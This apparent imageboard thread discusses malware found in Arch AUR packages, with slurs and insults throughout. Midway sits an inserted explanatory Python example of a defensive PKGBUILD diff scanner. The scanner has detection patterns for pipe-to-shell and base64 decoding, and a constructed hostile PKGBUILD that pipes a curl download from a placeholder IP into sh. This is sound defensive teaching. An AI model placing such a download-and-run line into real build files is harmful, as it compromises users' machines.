Again, Arch users actually check this shit.
>>
>>109039511
What about COPR?
>>
>using VR
>on linux
odd.
>>
reminder that the AUR comes turned on by default on cachyOS
retard gaymers getting pwned on a mass scale rn
>>
>check the packages
>it's all slop packages you really shouldn't be installing anyway
>if you MUST install them, the affected people clearly didn't inspect the PKGBUILD which every fucking good AUR helper lets you do
>>
>>109039455
>2FA is just a method of triangulating you
>2FA that can triangulate who you are and what you are doing
...how? genuinely asking.
>>
>never update AUR packages because I'm lazy
>already ignored python-future because it wouldn't build with 3.13
>malware doesn't even steal firefox credentials anyway
Nothing ever happens
>>
>>109032312
most decent AUR helpers throw a bunch of warnings if you install an orphaned package too
>>
>>109039554
>on by default
In what way is it "on"? You mean it comes with an AUR helper preinstalled?
>>
>>109034474
i swapped most of my AUR packages with flatpaks and it just werks since then + you get sandboxing so a well designed flatpak can't really infosteal
>>
>>109039712
still need to use flatseal to make sure the default perms aren't like a wide open door
but yeah now that I think about it, I had been doing the same over the past couple of years.
down to 21 packages from the AUR, but think I can go a little further yet.
>>
>>109039748
it's not perfect but iirc flatpak-next should fix a lot of the problems around permissions

i just got tired of dealing with package rebuilds on the AUR
>>
>retards taking this opportunity to shill flatpak
>>
>>109035762
bro. just read the fucking pkgbuild diff, if anything this should have been a wake up call to do just that
>>
>>109040014
people who can't do this shouldn't be using arch. in most normal updates it's like 2-3 lines that get changed.
>>
>>109040024
I suspect a lot of victims from this are going to be cachyos people kek
>>
>>109039628
FIREFOX CHADS WON
>>
>>109040038
i also noticed a lot of weird broken pidgin english comments about this so idk if MS spun up a bunch of shills or what
>>
Imagine being too much of a scrub to compile your own packages on Gentoo
>>
>>109040745
what do you think the AUR is exactly
>>
>>109031404
>Gnome Linux
GNU Network Object Model Environment Linux
>>
>>109040038
How many of those are going to be using paru or even shelly though? Most will probably stick with cachy's own installer surely.
>>
>>109031268
VR fags deserve it
>>
>Fetching infected package list...
>Checking 1577 known infected packages...
>Clean: none of the known infected packages are installed.
Feelsgoodman.jpg
>>
How FUCKED am I?
>>
so this is how they're gonna do away with *nix huh, because you just know this is poc and every distro is now marked for death following "AI" and apple ms alphabet will tout their closed source approach as the messiah of software when in truth they're far worse and literally push malware like tiktok so they can continue living in their globalist extremist lalaland where china in exchange will allow meta and other burger platforms aaaany day now
>>
>>109041356
run
pacman -Qs alvr
and hope you don't see anything
>>
>>109031408
>but it seems like it's basically a Wild West frontier land where there's nearly zero oversight and basically anything goes.
Just like with all user maintained repositories in any distro.

There's nothing better or worse with Arch in this regard.
>>
>>109039455
>2FA is just a method of triangulating you
Source?
>>
>>109038240
Good one, where is steamos?
>>
>>109041356
Deserved for using meme browsers, also did you use a local password manager?
>>
>YOU AGREE TO USE THE AUR AT YOUR OWN RISK
ogey
>you got malware
HOW COULD THIS HAPPEN? THEY SHOULD HAVE PROTECTED MEEEEEEEEE
>>
How does this affect me as an arch user that immediately removed aur related things?

I thought the whole point of linux was compiling shit and reading the buildfiles and being the one to destroy your os rather than you being lazy in a terminal
>>
>>109031293
Use containers or have autistic selinux labeling no one is going to bother doing.
>>
It always makes me laugh that antivirus still can't stop this shit and yet retards still force its use.
>>
>>109044487
The best antivirus is not being a retard
>>
>>109044487
The funniest thing is how many people probably have rats on windows keylogging their every move. Same thing on retards who came from it thinking you have to updoot everything instantly as soon as you go in. People really haven't learned not to fix shit that isn't broken.
>>
>>109044496
True or not, there are whole compliance frameworks that demand it be used.
>>
>>109044513
I watched a guy run a windows update that caused 100 computers in a room to all bootloop after telling him that it would happen on the specific hardware setup.

I said go ahead then.
took him 2 days to get em all back to the previous state because the retard also didn't image beforehand.
>>
>>109039932
Your alternative, dumb fuck? Ever tried writing a MAC policy?
>>
>>109044527
maybe learn to read, faggot
see
>>109044454
>>
>>109044465
>as an arch user that immediately removed aur related things
But Arch doesn't come with those in the first place, aur helpers aren't even in the official repos so if you want to use them you first have to build the packages manually.
>>
>+30000 unofficial Windows packages from random websites have malware every month
>nobody cares
>+20000 unofficial macOS packages from random websites have malware every month
>nobody cares
>400 unofficial Linux packages from random websites have malware for 3 hours
>anons move to Windows and macOS
/g/ is probably the most cuck slave stockholm syndrome baby duck retards ever in the history of the world.
>>
>>109045144
linuk was not supposed to get birus
>>
So what is the solution? Why doesn't Arch team just take over the management of AUR?
Offloading security and quality control of AUR onto users doesn't work in 2026 (it never did but especially not now).
A fucking LLM bot can sign up, take over orphaned packages, insert malware and push updates... and it would take hours/days for it to be discovered and potentially thousands of users would be impacted.

PS: hope you don't have your crypto wallet on your main machine.
>>
>>109044469
i have a very autistic firejail set up
so the risk to me is very much reduced

the amount of time i wasted debugging issues caused by it wasn't worth it
>>
>>109035489
You can use portage on Arch.
>>
>>109045055
I blocked all of their mirrors. I have the list at the very least.
>>
>>109045742
Do you want to be a tard wrangler for free?
>>
>>109045144
it's 1365 at the moment according to https://md.archlinux.org/s/SxbqukK6IA
>>
>>109047421
wait, no, it's 1740
>>
>>109047415
Well, they should move the AUR to a different domain and not be associated with it. They are damaging Arch's reputation (what they have left of it) by doing the hosting and by branding it as part of Arch.
Security issues will only multiply going forward.
>>
>>109047466
I see it no different than not immediately removing the microshit store from windows 10 and up.

I do agree with you though. While this sort of thing is common in user repositories (github always gets fucked) it could be better warned of and watched.
>>
>>109047486
Maybe delay all immediate updates by a few hours/days so people can check out the release? Or create some kind of an "update check" LLM that can catch the most obvious trojans?
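The delay-before-building idea above, as an added example that is not from the thread and not part of the AUR or any Arch tooling: a pre-build gate that refuses to build from an aur.git checkout whose newest commit is younger than a cooling-off window, and that diffs the new PKGBUILD against the copy you last reviewed, flagging the kinds of additions a reviewer would want to look at (pipe-to-shell, base64 decoding, eval, writes under $HOME, hard-coded IP URLs, download URLs that were not there before). The three-day window, the heuristic patterns, the package name `examplepkg` and both PKGBUILD texts are constructed for the example; 203.0.113.7 is a documentation address, not a real host.

```python
"""Pre-build gate for AUR updates: cooling-off window plus PKGBUILD diff triage.

Added example, not AUR/Arch project code. The heuristics below are an
illustrative list, not an official rule set.
"""
import difflib
import re
import time

# Assumption: a three-day cooling-off window; the right value is local policy.
COOLING_OFF_SECONDS = 3 * 24 * 3600

# Hypothetical heuristics for suspicious additions to a PKGBUILD.
RISKY_PATTERNS = {
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b"),
    "base64_decode": re.compile(r"\bbase64\b.*(-d\b|--decode)"),
    "eval": re.compile(r"\beval\b"),
    "touches_home": re.compile(r"\$HOME\b|\$\{HOME\}|(?<![\w/])~/"),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),
}

URL_RE = re.compile(r"""https?://[^\s'")]+""")


def cooling_off_ok(last_commit_epoch, now=None, min_age=COOLING_OFF_SECONDS):
    """True when the newest aur.git commit is at least `min_age` seconds old.

    In practice `last_commit_epoch` is the output of
    `git -C <pkg> log -1 --format=%ct` on the cloned AUR repository.
    """
    if now is None:
        now = time.time()
    return (now - last_commit_epoch) >= min_age


def added_lines(old_text, new_text):
    """Lines present in the new PKGBUILD but not the old one ('+' diff lines)."""
    diff = difflib.unified_diff(
        old_text.splitlines(), new_text.splitlines(), lineterm="", n=0
    )
    return [ln[1:] for ln in diff if ln.startswith("+") and not ln.startswith("+++")]


def scan_update(old_text, new_text):
    """Run the heuristics over the added lines only and list download URLs
    that did not appear in the previously reviewed PKGBUILD."""
    findings = []
    for line in added_lines(old_text, new_text):
        for name, pattern in RISKY_PATTERNS.items():
            if pattern.search(line):
                findings.append((name, line.strip()))
    new_urls = set(URL_RE.findall(new_text)) - set(URL_RE.findall(old_text))
    return {"findings": findings, "new_urls": new_urls}


def gate(old_text, new_text, last_commit_epoch, now=None):
    """Decide whether to build. Returns (allow, reasons); allow is True only
    when the commit is old enough and the diff raised nothing."""
    reasons = []
    if not cooling_off_ok(last_commit_epoch, now):
        reasons.append("newest commit is younger than the cooling-off window")
    report = scan_update(old_text, new_text)
    for name, line in report["findings"]:
        reasons.append(f"{name}: {line}")
    for url in sorted(report["new_urls"]):
        reasons.append(f"new download URL: {url}")
    return (not reasons, reasons)


# Constructed sample: the PKGBUILD you reviewed and built last time.
OLD_PKGBUILD = """\
pkgname=examplepkg
pkgver=1.2.0
pkgrel=1
arch=('x86_64')
source=("https://example.com/examplepkg-$pkgver.tar.gz")
sha256sums=('SKIP')

package() {
  cd "$srcdir/examplepkg-$pkgver"
  install -Dm755 examplepkg "$pkgdir/usr/bin/examplepkg"
}
"""

# Constructed sample: the same package after a hypothetical hostile update.
NEW_PKGBUILD = """\
pkgname=examplepkg
pkgver=1.2.1
pkgrel=1
arch=('x86_64')
source=("https://example.com/examplepkg-$pkgver.tar.gz"
        "https://203.0.113.7/patch.sh")
sha256sums=('SKIP' 'SKIP')

package() {
  cd "$srcdir/examplepkg-$pkgver"
  install -Dm755 examplepkg "$pkgdir/usr/bin/examplepkg"
  curl -fsSL https://203.0.113.7/patch.sh | sh
}
"""

if __name__ == "__main__":
    one_hour_ago = time.time() - 3600
    allow, reasons = gate(OLD_PKGBUILD, NEW_PKGBUILD, one_hour_ago)
    print("build allowed:", allow)
    for reason in reasons:
        print(" -", reason)
```

The "old" text should be the copy you saved when you last built, not something pulled back out of the same repository you are now distrusting. Two caveats a practitioner should keep in mind: the cooling-off window only helps if somebody actually reads the diff during it (an automated takeover can simply wait the window out), and the patterns are triage, not a verdict; the .install file and any fetched sources still need the same reading.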
>>
>>109048062
The truth is I don't update shit unless I HAVE to.
I don't know why some people are spastic as fuck with their home computers as if they are working for a retard corpo. In that case I'd absolutely be updating everything and maliciously complying with everything just to fuck with the lead.
>>
https://gist.github.com/Kidev/85756c3dcad3623ca5604a8135bafd14

Check if you've been compromised with this script.
>>
>>109048576
I have not been compromised. Why don't people just have an AIDS machine that they let get fucked by these so they can sniff out where this shit gets sent and then fuck with them?
>>
File: 1.png (54 KB, 275x258)
>>109047439
it's up to 1934 now

makes npm look weak
>>
>>109048803
I use arch btw
unironically though
I don't use AUR though I thought that shit was gay as fuck. Github but for faggots outside of the normal github grindr base
>>
Is there not a list of malicious commit hashes in the aur.git repos? Looking for the python-future one specifically. Arch maintainers have not made incident response particularly easy.
>>
>>109033179
And now you have Windows XP tier viruses so congrats I guess.
Meanwhile, I only upgrade from Debian oldstable to oldstable, and expect library authors to backport security fixes 3 major versions back. Software moves too fast and we need to slow it down. Otherwise your stupid binary shit could get included in the official mirror and wouldn't need a maintainer because it would only change once every 10 years.
>>
>>109048947
>I only upgrade from Debian oldstable to oldstable
the weird thing is that Fedora actually has something like oldstable but it's not advertised at all
>>
>>109047415
It's very Jewish of you to act like this is normal. If I host code, I am responsible for it. Every AUR submission should have been vetted.
>>
>>109049049
Can I get the teleport co-ordinates to this perfect world you think exists?
>>
>>109049049
>If I host code, I am responsible for it
yeah and hiro is personally responsible for all the deranged shit people post here
>>
>>109031268
The AUR is such an obviously pozzed shithole.
I use Wivrn for my headset anyway.
>>
>youtubers trick techlets into installing linux
>desktop marketshare goes slightly up
>distros become a more lucrative target for criminals and there's an uptick in aur malware
>goalpost is then shifted to "who uses the aur anyway? lol"
i hate you vermin with the passion of a thousand suns, everything your brown hands touch becomes shit.
>>
>>109049058
No, because you still have no argument, you're just shitposting retard cancer.

>>109049080
>users posting words is exactly like users posting software to your website to be downloaded and run by others
>>
>>109049080
This doesn't even make sense because hosts (including 4chan) have to take down CP and the other deranged shit. Leaving it up DOES make him personally responsible, because it makes him a redistributor.
>>
>>109047486
That makes no sense, Microsoft store comes with Windows and it is a curated app store by Microsoft. AUR doesn't come with Arch and it's a user repository.
>>
>>109049358
>Microsoft store comes with Windows and it is a curated app store by Microsoft

Apple, Android, Windows app stores are a dump of jeet malware binaries. There are no repercussions for thirdworlders if they get caught.
>>
>>109049313
>users posting words is exactly like users posting software to your website to be downloaded and run by others
yes
it's user-generated content in both cases
>>109049322
>This doesn't even make sense because hosts (including 4chan) have to take down CP and the other deranged shit
and the AUR takes down malware if they get reports of it
>>
>>109031711
And mandatory cock scans for proof of age.
>>
>>109031694
Bitch-made human race takes the path of least resistance, not knowing it will lead to more resistance later.
>>
>>109031268
Isn't AUR an unofficial repo?
>>
>>109049152
>distros become a more lucrative target for criminals
If you aren't like the techlets you complain about, this still isn't a problem.